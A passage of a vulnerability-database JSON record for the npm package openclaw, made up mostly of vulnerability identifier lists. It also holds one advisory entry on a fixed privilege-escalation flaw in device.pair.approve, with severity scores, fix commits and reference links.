"VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-36cp-mh65-x882" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eaaf-8rfa-f3hz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91021?format=api", "vulnerability_id": "VCID-eda1-pnhb-bqes", "summary": "OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n## Summary\ndevice.pair.approve allowed an operator.pairing approver to approve a pending device request for broader operator scopes than the approver actually held.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/devices.ts now threads caller scopes into device.pair.approve.\n- src/infra/device-pairing.ts now rejects requested operator scopes that exceed the approver-held operator scope set.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35639", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00309", "scoring_system": "epss", "scoring_elements": "0.54421", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00309", "scoring_system": "epss", "scoring_elements": "0.54431", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00309", "scoring_system": "epss", "scoring_elements": "0.5442", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35639" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation" }, { "reference_url": "https://github.com/advisories/GHSA-hf68-49fm-59cq", "reference_id": "GHSA-hf68-49fm-59cq", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hf68-49fm-59cq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": 